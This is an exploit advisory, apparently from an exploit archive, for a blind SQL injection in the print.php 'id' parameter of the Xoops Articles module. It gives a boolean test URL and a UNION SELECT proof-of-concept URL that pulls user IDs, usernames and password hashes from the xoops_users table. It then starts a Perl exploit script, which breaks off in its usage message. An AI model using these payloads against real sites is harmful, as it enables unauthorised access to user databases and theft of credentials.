|
Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC
Type :
SQL Injection
Release Date :
{2007-03-26}
Product / Vendor :
Xoops Portal
http://www.Xoops.Org
Bug :
http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0
PoC :
http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*
Exploit :
#!/usr/bin/perl -w
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
use IO::Socket;
if (@ARGV != 3)
{
print "\n-----------------------------------\n";
print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\n";
print "-----------------------------------\n";
print "\nUniquE-Key{UniquE-Cracker}\n";
print "UniquE[at]UniquE-Key.ORG\n";
print "http://UniquE-Key.ORG\n";
print "\n-----------------------------------\n";
print "\nUsage: $0